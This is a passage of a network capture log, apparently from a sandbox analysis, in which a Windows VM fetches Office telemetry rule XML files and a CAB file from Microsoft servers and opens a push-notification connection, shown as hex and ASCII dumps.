                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:28 GMT
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      110192.168.2.64984413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1401
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095430Z-185f5d8b95c68cvnhC1NYCfn7s0000000a1g000000008np9
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      111192.168.2.64984113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 6d560277-a01e-0050-158c-3adb6e000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095430Z-r1d97b99577hc74hhC1TEBvbns00000008eg00000000e5s2
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      112192.168.2.64984213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1427
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 3044792c-001e-005a-088c-3ac3d0000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095430Z-1777c6cb7549x5qchC1TEBggbg00000009f0000000009rh4
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      113192.168.2.64984313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1390
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                      x-ms-request-id: c9275fb5-a01e-000d-708c-3ad1ea000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095430Z-185f5d8b95c96jn4hC1NYCbgp80000000a4g000000002pc3
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      114192.168.2.64984513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1364
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                                                      x-ms-request-id: c3eb962b-701e-003e-438c-3a79b3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095430Z-1777c6cb754mqztshC1TEB4mkc00000009f0000000007qe5
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      115192.168.2.64984840.115.3.253443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 50 63 64 6e 2f 47 36 64 55 61 32 69 55 2b 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 36 61 30 62 66 35 33 37 62 37 36 64 65 62 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: TPcdn/G6dUa2iU+3.1Context: bf6a0bf537b76deb
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 54 50 63 64 6e 2f 47 36 64 55 61 32 69 55 2b 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 36 61 30 62 66 35 33 37 62 37 36 64 65 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 66 61 45 58 74 6d 6c 36 59 73 6a 75 35 41 33 6b 48 47 6f 58 69 47 55 63 59 75 77 47 4c 4e 34 6c 56 75 74 39 70 4e 31 6f 63 52 6d 6f 67 45 58 48 76 30 43 54 44 49 7a 32 30 57 79 45 4c 63 41 67 53 57 68 59 79 71 30 4b 71 2f 35 57 54 4c 68 4f 30 6a 56 63 32 53 6d 45 6a 4a 31 48 6d 4c 30 36 45 6d 4d 32 6c 67 35 71 39 71 48 2f
                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: TPcdn/G6dUa2iU+3.2Context: bf6a0bf537b76deb<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAefaEXtml6Ysju5A3kHGoXiGUcYuwGLN4lVut9pN1ocRmogEXHv0CTDIz20WyELcAgSWhYyq0Kq/5WTLhO0jVc2SmEjJ1HmL06EmM2lg5q9qH/
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:30 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 50 63 64 6e 2f 47 36 64 55 61 32 69 55 2b 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 66 36 61 30 62 66 35 33 37 62 37 36 64 65 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: TPcdn/G6dUa2iU+3.3Context: bf6a0bf537b76deb<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC58INData Raw: 4d 53 2d 43 56 3a 20 5a 2b 4f 70 70 77 4f 32 51 45 2b 65 76 6c 4f 54 68 4c 71 77 68 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: Z+OppwO2QE+evlOThLqwhw.0Payload parsing failed.


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      116192.168.2.64984913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1391
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: c0af4880-401e-00ac-328c-3a0a97000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095431Z-185f5d8b95c9mqtvhC1NYCghtc0000000a50000000007fp3
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:31 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
